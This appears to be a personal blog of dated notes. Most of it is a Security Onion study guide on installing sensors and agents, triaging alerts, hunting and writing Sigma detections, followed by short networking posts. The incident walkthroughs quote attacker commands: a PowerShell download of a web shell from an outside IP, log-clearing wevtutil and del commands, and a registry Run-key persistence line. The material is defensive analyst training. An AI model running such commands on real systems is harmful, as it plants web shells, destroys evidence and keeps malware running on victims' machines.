Wednesday 25 August 2021

Security onion

 

Platform

  • OS: CentOS / Ubuntu (using Docker)
  • Infra: Salt, Docker, Elasticsearch, Redis, Logstash, Filebeat, Grafana
  • Network and host data: Wazuh, Osquery, Beats, Steno, Suricata, Zeek, Strelka
  • Analyst tools: SOC, Hunt, Kibana, TheHive, CyberChef, Playbook, Fleet, Navigator


Install modes

  • Forensic analysis (import mode) - after-the-fact analysis
  • Analyst workstation - for analysing malware inside a VM
  • Test (evaluation) - just for testing
  • Production
  • Standalone - small environments
  • Distributed - recommended; a Security Onion grid with roles split across different servers


Where to get help

  • securityonion.net/help
  • docs.securityonion.net FAQ
  • Forum (github discussions)
  • Paid support available

Install

  • Download the ISO from https://securityonionsolutions.com/software
  • The ISO is on github
  • ISO is 7GB
  • Verify your image
  • The ISO image is the quickest and easiest method (installs CentOS 7)
  • It's also possible to do a git clone on your own CentOS/Ubuntu server
Min spec
12GB
4 CPU

Standalone min spec
16 GB 
4 CPU
200GB (or more) SSD recommended

VirtualBox used for testing
Installing in VirtualBox, I pick Linux -> Other 64-bit

You would want more in a production environment 

Security Onion offers appliances

Storage

  • Local storage is supported
  • Remote/network storage may work but is not supported

NIC (Intel preferably)

  • One for network / management
  • One for sniffing traffic
  • Wireless interfaces are not supported but may work

UPS

  • UPS is recommended because SecOnion uses various databases which don't like power outages.

Server/Appliance terms

  • Standalone - everything on one server. Can be taxing for larger environments
  • Manager node - stores the logs and runs all the reports
  • Search nodes - can be used to parse and index events
ISO install
The ISO will ask you for a user; this is for the underlying OS
After install you will be asked to reboot
After login, setup will start
Choose mode type
  • Standalone - all components on a single system
  • Distributed - components split across nodes, for larger networks
  • Import - for importing pcap and logfiles
  • Other - other types
You have to agree to the Elastic license.

Standard - the manager has internet access (most installs)
Airgap - the manager does not have internet access

Select MGMT NIC
Recommended to use a static IP e.g. 192.168.80.45/24
Setup asks for direct internet or proxy (direct for most installs)

Select the monitor NIC.
This will be connected to a SPAN port or network tap

Set updates for the CentOS (automatic recommended)

Enter the home network (HOME_NET); you'll want your inside networks here.

Enable all components to be installed

Keep docker default IP range

Enter email username and password for the web interface

Select to access web interface by IP
If you use hostname you need to have it resolving in DNS or /etc/hosts

Config NTP

Yes, allow so-allow. Can fill in a host IP or range e.g. 192.168.80.0/24

Check after reboot with:
sudo so-status (wait a few minutes for everything to start up and show a status of "OK")

Extra agents
You can install extra agents to get more info from the hosts. However, this is 3 more agents to install, configure and maintain. The installers can be downloaded from the Security Onion web interface

Sysmon / winlogbeat
Download the MSIs from the Security Onion web interface
Download Sysmon from Microsoft
Download the Sysmon config from GitHub (SwiftOnSecurity)

Run so-allow on Security Onion (Logstash Beat listens on port 5044)
Configure the network the Beats are to come from

Install Sysmon with the config on the target host(s)
Install winlogbeat on the host
config file = C:\ProgramData\Elastic\Beats\winlogbeat\winlogbeat.yml
There is an example file 

Configure winlogbeat to forward events to the Security Onion server
Start the "winlogbeat" service
Winlogbeat ships Windows event logs to Elasticsearch or Logstash
C:\Program Files\Elastic\Beats\7.15.2\winlogbeat\winlogbeat.exe
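The winlogbeat.yml referenced above boils down to two parts: which event logs to read and where to ship them. A minimal sketch (the manager address and the exact log list are assumptions for this setup, not the shipped example file):

```yaml
# Minimal winlogbeat.yml sketch - adjust to your environment
winlogbeat.event_logs:
  - name: Microsoft-Windows-Sysmon/Operational   # Sysmon events
  - name: Security                               # standard security log
output.logstash:
  hosts: ["10.x.x.x:5044"]   # Security Onion manager, port opened via so-allow
```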

start mspaint
check eventvwr 
applications + services logs -> Microsoft -> Windows -> Sysmon Operational

This event should have been forwarded to Security Onion. Wait a few minutes and check the web interface. Go to Hunt -> * | groupby event.module event.dataset

wazuh (HIDS)
so-allow -> w
sudo so-wazuh-agent-manage 
add agent
extract auth key
Install MSI on target host
Tick to launch config
Fill in manager IP 10.4.9.90
Fill in auth key
start service from services.msc

osquery
so-allow -> o
[a] - Analyst - 80/tcp, 443/tcp
[b] - Logstash Beat - 5044/tcp
[e] - Elasticsearch REST API - 9200/tcp
[f] - Strelka frontend - 57314/tcp
[o] - Osquery endpoint - 8090/tcp
[s] - Syslog device - 514/tcp/udp
[w] - Wazuh agent - 1514/tcp/udp
[p] - Wazuh API - 55000/tcp
[r] - Wazuh registration service - 1515/tcp

fill in network or host

Install MSI on target host, it should automatically install

Ensure the service is started:
LauncherSoLauncherSvc
C:\Program Files\Kolide\Launcher-so-launcher\bin\launcher.exe

You can check the config file:
"C:\Program Files\Kolide\Launcher-so-launcher\conf\launcher.flags"
The hostname should be the manager server, 10.x.x.x:8090


Analyst tools

Remember so-status to make sure everything is up and working
sudo so-test (downloads PCAPs and replays them through the system; needs internet access)
Log into the web interface 
Login with email address configured during setup
  • Alerts - Review alerts the system has detected
  • Hunt - Look for threats; hunt for things that may not have triggered an alert
  • PCAP - For pcap imports
  • Sensors - All the sensors connected to the management server
  • Downloads - Packages for Beats/endpoint agents
  • Administration - Admin of the system
  • Kibana - Visualisation of Elastic data with dashboards/categories
  • Grafana - Visualise the performance of the system
  • CyberChef - Useful tools during investigations
  • Playbook - Build detection playbooks for when something new appears
  • Fleet - Web interface for Osquery (server and client details)
  • TheHive - Case management (alerts can be escalated into a case in TheHive)
  • Navigator - Visualise coverage of the MITRE ATT&CK framework
Alert triage and case creation

Start on the alerts interface
On a regular basis an analyst should be looking at these alerts.
The idea here is that they will work the queue each day and try to get it down to 0.
They can open cases for other teams to resolve issues.
They will need to figure out if it's something that needs to be escalated or something that can be acknowledged/dismissed.
This is a task on its own.
It can be sorted by high severity

One example: "Dropbox client broadcasting". This could be a legitimate host that is actually using Dropbox. When you drill down and check the IPs, you can click the bell icon to make it go away, but it will come back. You can tune the system to ignore that rule. Similar ones are Skype.

Once we have tuned out common apps we can look for real threats.

If we see "checkin", that suggests malware is on a PC and is trying to contact a CnC server. We can drill down into this event. Here we can get more info like source/destination IP.

You can click "show PCAP", which will show us the PCAP for this event.
Blue is from our source client
Red is the destination server

Endpoint is posting binary data to some suspicious URL like malware.web

Now we can look into our source client and see if there are other alerts.
Click the source IP and click the "empty" magnifying glass to see all alerts for this host
We can see an EXE was downloaded

From the header we see "MZ", "PE" and "This program cannot be run in DOS mode."; this tells us it is a Windows executable.

We could download it as a PCAP
Open it in NetworkMiner and generate a hash for the file
Check VirusTotal for that hash, which might identify the virus

Zeek is running so we can check it for file events for that external IP. Click the target icon to go to the hunt interface

It is common to move between the alerts interface and the hunt interface.
Let's look at the Zeek file log
Zeek has analysed the file and we can see
hash.md5
hash.sha1 (left click and go to VT (VirusTotal))
We can see the file was detected by 50/70 scanners

We are pretty sure this is malware. We need to make a case in TheHive now. We do this because we want to store all the info in one place. We may need to hand over to another shift or another team to do the clean-up.
Click on the blue escalate icon on the download event
Do the same on the checkin event
Any other events you want 

Go to TheHive
Each event will have its own case
We can merge all the events into one case to keep them together
We can attach observables like the hash, EXE, URL, source and destination IP
Tick that it's an IOC
We can add tasks:
  • investigate other alerts from the compromised hosts
  • get someone to clean the infected hosts
  • block the CnC IP on your firewall
  • look for other connections to the CnC IP (find other infected hosts)
AD Hoc Hunting
Instead of looking at alerts, we will ask/answer questions.

For example, looking at all of the HTTP traffic seen, what destination ports were used? We would expect port 80, and port 443 for HTTPS. However, if we see traffic using strange ports like 6666 we want to know about that traffic and start looking into it. Is it legitimate or not?

Other things to hunt for
  • Checking HTTP status codes and messages. Are we seeing any non-standard results? For example, we expect code 200 message "OK". What if we see code 200 message "lol"?
  • User agents seen on the network. We would expect mostly the company's browser, but there could be other user agents; some could be legit, others not.
  • Searching for Linux commands like dig, curl, nc being used on Windows hosts
  • Filter on traffic that was allowed to pass through the firewall (can group by source IP, destination IP)
  • Looking at port 22 (SSH), often used to tunnel in. Most orgs have legitimate SSH traffic that would need to be excluded
  • Checking the number of alerts over time. If we see a spike in alerts, for example we normally get about 50 alerts but one day we see 150 in a short period, this should trigger an investigation. What caused those alerts, where did they come from, etc.

OQL (Onion Query Language) is used for searching the data
event.dataset: alert | groupby event.module event.severity_label

Events will be listed at the bottom. Each event can be drilled down into

If we click the drop-down arrow on the OQL bar there are many predefined queries set up for us.
event.dataset: http | groupby destination.port

Now we can see most traffic is going over 80/443.
We might see some on port 8080, a common alternative port
Left click one of the strange ports and click the "plus" magnifying glass

Our OQL changes to this
event.dataset: http AND destination.port:"8008" | groupby destination.port

Looking at this event
We see a strange host 4hhg.56hdshfjds.rocks (left click -> VT)
Sometimes the URL looks bad but it's actually fine
Malware domains tend to be new and change a lot.

The analyst was able to recognise base64 by the "==" padding on the end
They took this string into cyber chef
From base64 
We got an output but it didn't make much sense
The Magic operation tries to figure out the string
Intensive mode will try to brute force it, which can take time / impact the system
Scroll through and see if we can find anything recognisable
Doing this we spotted some public IP addresses.

network.community_id is a hash of the:
  • Source IP
  • Source port
  • Destination IP
  • Destination port
  • Protocol
We can search for that community ID 

Click the network.community_id and click the "clear" mag glass

OQL
"1:aasjklfhalksfhkjha" | groupby event.dataset event.module 

We can see entries from Zeek and Sysmon (needs the agent installed).
The network community ID makes it easy to correlate between different log sources.
Hover over the Sysmon event
We can see the PC it ran on
The process that was run
The user that ran it
You can google search the process and VT search too

In this case windows defender was downloading a file from the internet. We are not sure if it was legitimate or not.

The parent command line can be useful to look at; often bad stuff is launched from wscript or PowerShell.

We can look in Fleet (the web management interface for Osquery)
Osquery lets you query the system with an SQL-style language
SELECT * FROM users;
Maybe you see a user that shouldn't be on this system or a strange new user.
Checking the machine for auto starting software is a good place to start
SELECT * FROM startup_items;
Also services and scheduled tasks
SELECT name,action FROM scheduled_tasks;
You can filter for mpcmd, looking for that command line

This is an example of how ad-hoc hunting can help
  • We looked at outbound HTTP traffic
  • Looked at outliers
  • Drilled down into port 8008
  • This led to a PCAP where we found public IPs
  • We used the community ID, which led to a Sysmon log
  • We found the process that created that network connection
  • We queried Fleet (Osquery) to find where this is being run from
  • We found where on the machine that process is starting up
  • We should create a case in TheHive
Sometimes you will find legitimate software, like old servers/services that haven't been shut down. It's still good for the business to clean these up before they cause a security issue

Detection engineering
  • Detection gap - understanding where we are not monitoring
  • Configure detection pipeline - set up a new sensor, install Osquery, configure logs
  • Write/test detection - creating your own detection rules
  • Production and tuning - enabling the rule in production; usually requires tuning

Detection playbook
  • Objective - Useful info for later and other teams
  • Machine query - Can be zeek script, playbook, sigma signature etc
  • Next steps - What do we do after detection, how do we fix it
Playbook has lots of plays already created for you.
You can go in and view the play
View ElastAlert Config 
View Sigma 

Next steps examples could be lock down permissions on the share and contact system owner.

Sigma is an open signature format that can be applied to any type of log file. The idea is to make it easy for security workers to write and share signatures.
Snort/Suricata rules are for network IDS
YARA rules are for files
Sigma rules are for logs
Sigma is YAML

For example, we can look for Windows accounts being created. Not something bad on its own, but we might find attackers creating their own users. Windows event log ID 4720. Does the username follow our company's naming convention policy?

Click Convert to change it into an SO Elasticsearch query.
Click copy
Go to the hunt tab, paste the query and make sure we are getting results
Edit the play as needed
Now we have tested it's working, we can "create play from sigma"

Edit the play
Change the status from "Draft" to "Active"
Now it's in production and will be looking for those logs

When the play generates an alert it will appear in the Alerts tab. The source will be playbook. If one pops up that we don't recognise, we can see the play details and read the objective of the play. If we create a case in TheHive, we can see tasks already set up from our play. This is good because we go from detection to next steps and have context for why the alert popped and why it's important to fix.

Security Onion 2
Security Onion 2 was released Oct 2020
You want to monitor north/south traffic directly behind the firewall: traffic that is going in/out from the internet.
East/west traffic from clients/DMZ <-> servers
SO also likes to collect Windows logs from the servers and clients

NIDS alerts from Suricata (starts an investigation)
Protocol metadata from Zeek (provides context)
Full PCAP from Google Stenographer (high performance/indexing)

Sniffing NICs
Collect the raw data with AF_PACKET (built into the Linux kernel by default)
AF_PACKET is a kernel-based load balancer.
The purpose of an AF_PACKET socket is to allow network communication at the link layer, for example to receive or transmit raw Ethernet frames.
Consuming from AF_PACKET are Stenographer / Suricata / Zeek
They write their data to several locations
  • Stenographer -> full packet capture -> /nsm/pcap -> sensoroni agent
  • Suricata -> IDS alerts -> /nsm/suricata -> Filebeat
  • Zeek -> protocol metadata -> /nsm/zeek/logs -> Filebeat
  • Zeek also extracts files like EXE, PDF -> /nsm/zeek/extracted/complete/
  • Those files are then analysed by Strelka
Strelka is a real-time, container-based file scanning system used for threat hunting, threat detection, and incident response.

Filebeat is the platform for lightweight shippers to push data from your servers to the Elastic Stack. We can have a Filebeat for Mac or Windows etc., so Windows logs are shipped into your SO Elasticsearch/Logstash

Endpoint visibility
Osquery - cross-platform way to collect logs from clients. We can also query endpoints with an SQL-style language
Elastic Beats - alternative to Osquery: winlogbeat, filebeat, auditbeat etc.
Wazuh HIDS - host-based intrusion detection system. Also cross-platform for log collection, rootkit detection etc.
Sysmon - Sysinternals tool that gives great logging for Windows. These logs are pulled off the endpoint with one of the agents above
Autoruns - Sysinternals tool that also gives great information
There are some options here and the enterprise can choose what works for them

SOC (security onion console)
New management interface
One stop shop to access all of the interfaces

Alerts interface
Any IDS, when we set it up, generates lots of alerts. Too many. How can we slice and dice the data? SOC has created a simple but powerful interface.
A security analyst should work the alerts queue and try to get it down to 0 each day: weed out false positives and normal stuff, investigate suspicious stuff, and open cases for confirmed malware infections etc.
Pivot from alert -> full pcap
Pivot from alert -> hunting interface
The alerts interface is not just Suricata; it includes:
  • Suricata alerts (NIDS)
  • Zeek alerts (file / DNS etc)
  • HIDS alerts (Wazuh)
  • YARA file matches (Strelka)
  • Playbook matches (Sigma sigs and your own custom detection playbooks)

Hunt interface
Asking questions getting answers
Looking for outliers
Think like an attacker, what would they be trying to do
Crown jewels approach: our most important data is on server A in database X, so let's look at traffic and processes to/from that server/database.
Ransomware often looks to encrypt file shares, so let's look at activity on those.
Pivoting to full PCAP, VirusTotal etc

Kibana dashboards - visualising data
CyberChef - Tools for encoding/decoding 
Playbook - pull rules from the Sigma community and convert them to run on an Elasticsearch backend, moving threat hunting into an automated process. We might find a threat on one customer, create a detection and remediation, and copy/paste that play.
Fleet - Web interface for OSquery
TheHive - case management tool; all interfaces can escalate and create a case in TheHive (blue triangle)
ATT&CK Navigator - MITRE framework; the idea is to follow attacker tactics
Grafana - Monitor health of deployment

Analyst workstation
If you are extracting malware or reverse engineering software, you will want to do that inside a VM
You want to run it inside an analyst workstation
Gives you the usual tools

Community power
  • Emerging Threats NIDS rules
  • Wazuh HIDS rules
  • Sigma rules
  • Yara rules  / Strelka
  • Elastic common schema  (ECS) other tools can work with this
  • Community ID for correlation
Searching for the community ID value will help you find other alerts/logs from other sources and can help you find related activity.

Search Osquery for that community ID and it can return the process that generated that network traffic.

Sysmon is free but it's not open source. Community ID support has been requested but has not been added yet. Security Onion Solutions has sponsored a way to dynamically generate the community ID value, so now you can correlate all of your logs together.

Use cases
Smallest: forensics VM, import pcaps
Production deployment: start with a standalone deployment on a server, everything on one server. Will work OK in smaller environments
You will probably want to scale to a distributed production deployment
Central server / manager
One or more forward nodes - sensors forward all the logs to the manager which stores them in search nodes
One or more search nodes - search on the data

As we move from forensics VM -> standalone -> distributed the resource requirements go up. 

Raw PCAP -> Forward nodes (osquery/strelka/suricata/wazuh/zeek) -> Filebeat -> forward logs -> Manager (Logstash -> Redis -> Elasticsearch) -> Search nodes (Logstash -> Elasticsearch <-> Curator)

This design is scalable because if we want to add more network visibility we can add more forward nodes. If we are getting slow searches we add another search node.

Snort support
Looking at adding Snort later, when Snort 3.0 is released

RHEL 7 support
Working on support for that in the future

MSP
No MSP-style manager yet
Looking at adding redundancy for managers, but that's further down the pipeline
At the moment customers should create their own grid and admin it from there.

Analyst desktop
so-analyst-install
Install so 2 in a VM (analyst install) 
No sniffing
No Elasticsearch
Just PCAP tools

You can do a full standalone install
After setup is completed, run so-analyst-install

You could also do a CentOS minimal install
and git clone the script

Wazuh
Every node runs a Wazuh manager
Wazuh api
Rules

Can I point firewall syslog (or another device) to the manager?
This is possible. You can send it to a forward node or the manager

AWS
The SO 2 AMI will be on the marketplace


Alert Triage & Case Creation

We assume Security Onion has been installed correctly.
HOME_NET/EXTERNAL_NET variables have been configured

In the Alerts tab, check the alerts for the last 24 hours
The bell icon acknowledges an alert (makes it go away)
The blue triangle escalates it. This opens a case in TheHive.

Left click on the alert name and drill down
Click the arrow to expand details
Check the source/destination IPs
Get info on your servers
Look at rule.rule
Look at the network data decoded

We can left click on the attacker's public IP and click "only" to see all events for that IP

If we escalate, that will create a case in TheHive
In TheHive we can see the case has been created, and we can add extra info here
Go into the observables and add the IPs we found along the way
TheHive will compare observables between cases and we might spot something else

"Security event log cleared" coming from playbook
Looks bad: someone was clearing out logs

"Commands completed" (Suricata)
left click network data decoded -> actions -> pcap 


Left click the attacker ip -> actions -> hunt
This will bring us to the hunt interface

We might find a webshell.php; add it as a file observable in TheHive

If we have a web shell we want to know where it came from and what it did.
Looking at the network logs/pcaps 

Go to the PCAP interface
Select the sensor name
Source/destination IP
Anything that was exchanged on that day
This will generate a PCAP of all the traffic between the attacker and the webshell server
The attacker ran "wevtutil cl Security" to clear the security logs
We may also see "wevtutil cl Application"
Deletion of the web server logs: "del /f /q c:\xampp3\apache\logs\*"

What if the traffic was over port 443?
Playbook uses Sigma rules (vendor-agnostic rules) to look for attacks
event_data.message
event_data.winlog.event_id 1102 (log cleared)
Needs Windows event log forwarding

Can click on the username -> hunt
Click on process create -> include
process.command_line -> group by
Group by @timestamp


How did the web shell get on there?
Hunt interface query
"webshell.php" | groupby @timestamp event.module event.dataset
We may see
a PowerShell event
Zeek
Suricata

Looking at the PowerShell event
winlog.event_data.ScriptBlockText
Invoke-WebRequest -Uri "http://100.200.7.7/webshell.php" -OutFile "C:\xampp3\htdocs\webshell.php"
This is like a wget to download the PHP script
The next step would be to see the user
winlog.user.name
Left click user "bob" and include
Remove "webshell.php" because we want to see everything bob did
Open an event with the arrow > click the ScriptBlockText layers icon so it shows as a group-by field

We can look for the attacker IP where the script came from 100.200.7.7
We can add the hash to the hive

From the hunt page
Left click -> hash.md5 -> actions -> pcap
We can get the full PCAP of that file so we can look at it and see what it does
In this case the webshell was a standard one available on GitHub

In the hive we can add tasks for teams

Web team: clean up webshell.php
Server team: remove the attacker account
Server team: reset bob's password and check his devices
Server team: remove RDP access via the internet, install MFA etc.

When we close the case, the observables will still be compared in TheHive.

Ad hoc hunting
Not all malicious activity will generate alerts
When hunting we need to ask questions and find the answers, all the while looking for suspicious activity

The hunt interface has OQL (Onion Query Language)
Work off the last 24-48 hours

The down arrow has lots of predefined queries.
groupby event.module event.dataset
windows_eventlog (Windows logs need to be forwarded to Security Onion)
Zeek logs
ossec (needs the Wazuh agent installed)
sysmon (needs the service installed)
osquery (needs the agent installed)

Left click -> include on Zeek
Include on SSL traffic
SSL is encrypted
(In Options you can disable the automatic group-by update)
Expand an event and click the layers icon to add group-by fields
Remove event.module and event.dataset

Now you can see SSL traffic
Most HTTPS/SSL traffic should be on port 443
You can exclude 443 to see if anything is running on other ports
You can look into this: is it normal?

ssl.validation_status is good to look at
We might see certificates that have expired
We could find self-signed certificates

Looking at the count and ssl.server_name
you can see which servers are being visited a lot
You will see a lot of Microsoft and CDNs
You could exclude microsoft.com

Often we see shell scripts run from free public hosting sites like
GitHub, Pastebin, Dropbox, Google Drive, OneDrive etc

Hunt for ssl.server_name: *.githubusercontent.com
Left click source IP and click -> group by

Once you find a strange event, left click -> actions -> correlate
This will show all related events
Check the conn log
Correlate again on the network.community_id

You may find a process
On the process GUID you can left click -> "only" on the GUID

Arrange your timestamps earliest first.
We can see the process does a DNS query for malware.net
We can do a query on VirusTotal for that
From there it looks like a crypto miner
We can see other related URLs / EXEs etc

You can make a timeline with 3 lines:
Alerts
Network
Host

Fill in all the information you have 

We see that malwareS.64.exe started and launched nslookup.exe with process injection. The attacker used the legitimate nslookup process to hide their own code inside it.

We can see it connecting to xmr.2miners.com
We can use the parent process value to trace back where it came from
Tracing it back, you can see the user downloaded a bad .exe file and ran it.
That .exe file launched the malware.

Looking at the command line of the processes, we can see the malware adding itself to the Run key so it starts up with the PC
cmd /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "malwareS64" /t REG_SZ /F /D "C:\users\bob\AppData\Local\Temp\malwareS64.exe"

We see the parent process was explorer.exe and the hash for this checks out, so this confirms the user launched it from Windows as normal.

Normally we will see a dropper process which goes out to get the malware; then it will install persistence and finally check in with CnC servers. In this case it was a crypto miner, which just uses computer resources and probably won't do anything worse like ransomware.

Now we have follow-on tasks to clean up, remediate, and run follow-on hunts.
Can we build automatic detections?
We have IPs / file hashes that we can check against the rest of our org
Keep in mind hashes and IPs are easy to change
nslookup is generally used by IT staff, not by normal users; we could alert when normal users run nslookup

Spotting crypto miners
We might see --algo for example

Network outliers e.g. TCP/4444
CommandLine stacking. Looking for process injection.
Startup tasks - many things add startup files. You might not want to alert on it, but you may want to hunt on it.
Should the user bob have rights to download and install .exe files?

The takeaway: when we find a suspicious event we need to think about what happened before and after it, build a timeline, and figure out what happened.

Detection Engineering
Detection engineering starts when we realise we have a gap in our detection. This could be when we are starting out with nothing, or after an incident where a user downloaded malware and we only found out later.

Detection gap -> identify and configure data source -> write + test detection -> deploy to production and tune

Let's say we want to know about Google Workspace
We can see Google Workspace provides an audit log

Set up a service account in Google Workspace
Configure Security Onion
Configure Elastic Filebeat (it has modules for lots of data sources)

Download the .json file from google
Remove the other scopes from the service account
We only need the read-only reports.audit scope

On the Security Onion manager CLI
Copy that .json file to the manager

*note* do some research on Salt, pillars and minions

vi /opt/so/saltstack/local/pillar/minions/so-manager_standalone.sls

Append the config for the Filebeat module to the end
filebeat:
We specify the path to the .json file,
the account,
and the interval

These are YAML files, so use spaces, not tabs

Restart the service
so-filebeat-restart

Check the logs
tail -f /opt/so/log/filebeat/filebeat.log

*note* In the GUI -> cheat sheet, the important files and logs are listed.

Query elasticsearch for google workspace
so-elasticsearch-query _cat/indices | grep google_workspace
We should see some indices with some logs

*Note* you may see a "!" on the grid because you restarted Filebeat recently; it will go away on its own

Go into hunt interface and look for logs from google_workspace

We can see event.action is the data we are looking for. Now we've got the data into Security Onion, we need to create a detection.

In Google Workspace, let's add a user to an admin group. That will generate an event and we want to make a detection from it.

google_workspace.admin_role

Go to playbook
Change plays from draft to active to turn them on
Plays are made from Sigma rules
Sigma rules are written in YAML
Sigma rules are vendor independent


title: Google Workspace - user granted admin role
status: experimental
description: detects when an admin role is added to a user
author: SOS
logsource:
 product: google_workspace
 service: admin
detection:
 selection:
  event.dataset: google_workspace.admin
  event.action: ASSIGN_ROLE
  google_workspace.admin.role.name|contains: admin
 condition: all of them
falsepositives: legit user-add
fields: user.target.email
level: high

Drop that into playbook; that will convert the Sigma into the SO Elasticsearch query. You can copy and paste that into the hunt interface to see if it works. Once you are happy with it you can make the play.

Edit and change the status from draft to active

Now when we add a user to an admin role, it should create an alert

By default ElastAlert runs every 3 minutes, so you might have to wait a little while for your new active play to generate alerts in the SO interface.


Setting up Sysmon

Setup the manager
ssh to the manager
sudo so-allow
b for Logstash Beat
Enter the IP address or range the clients will come from

Install sysmon on the client(s)
Sysmon records important events to the Windows event log
Download and install Sysmon on the Windows client. It installs a service.
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Sysmon can be very chatty; you can configure this
There is a SwiftOnSecurity config file which you can use as a good starting point

sysmon -i sysmon-config.xml

Install winlogbeat
Winlogbeat sends the Windows event logs (which contain the Sysmon logs) to Security Onion
In your manager, go to the Downloads section on the left.
Like Sysmon, it needs some config too.
Output will go to the manager IP on 50

Install it and check the box to open the winlogbeat config directory
You will want a config .yaml file

Open up Services
Look for the "Elastic winlogbeat oss" service and restart it

Now you can open mspaint.exe
Look at the event logs in eventvwr
Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational
You should see the log for mspaint being launched.


Gotchas
If /nsm fills up to 90%, pcap capture will stop. Security Onion gives 200 GB as the minimum, but in reality you need a lot more.
Location of the file to config HOME_NET: /opt/so/saltstack/local/pillar/global.sls

HOME_NET is hnmanager
global:
     soversion: 2.3.90
     hnmanager: '10.4.9.0/24,10.4.10.0/24'

EXTERNAL_NET can be added like so
suricata:
  config:
    vars:
      address-groups:
        EXTERNAL_NET: "!$HOME_NET"

Sensor files are in here:
/opt/so/saltstack/local/pillar/minions/




Wednesday 18 August 2021

bulk edit rules on palo alto firewall

Making a note here about bulk changing rules on Palo Alto firewalls. Apparently you can use the Expedition tool: import config, make changes, export config. There is another thing called pan-os-php https://github.com/PaloAltoNetworks/pan-os-php which is similar but you can do it on the CLI. I didn't have the time or the energy to try to install it and get it working, but it's something I might look into in the future.

Tuesday 10 August 2021

add static route on windows OS

Had a strange case where I needed to reach 169.254.x.x but the Windows OS was not forwarding traffic for it out of its network card


Run cmd as admin

route print (to get GW x.x.x.x)

route -p add 169.254.0.0 MASK 255.255.0.0 x.x.x.x

Thursday 5 August 2021

cisco duo DAG setup

 https://duo.com/docs/dag-linux

Replaced by Universal Prompt / SSO

See

https://duo.com/docs/sso-ciscoasa


add cisco ID account to contract for SW download

Look up your original order ID

Look for the PAK code

Go to https://ccrc.cisco.com

Look up the PAK code; here you can find the contract number

Follow these instructions

  • Go to Cisco Profile Manager
  • Select 'Access' tab
  • Click on 'Add Access'
  • Choose 'Full Support' and click on 'Go'
  • Enter service contracts number(s) in the space provided and click on the 'Submit' button.

https://community.cisco.com/t5/smart-net-total-care-portal-and/how-do-i-associate-a-contract-to-my-cisco-com-profile-cco-id/td-p/2744620


If they still are not added:

email: web-help-sr@cisco.com

Hello,

Can you add user@email.com to the contract 123456789 (Cisco anyconnect Apex) or tell me what has to be done to allow this.

User works for our customer ACME

My Cisco ID: ciscoid@email.com

Customer: ACME

Contract #: 123456789

Let me know if you need anything else.

Regards,

Jack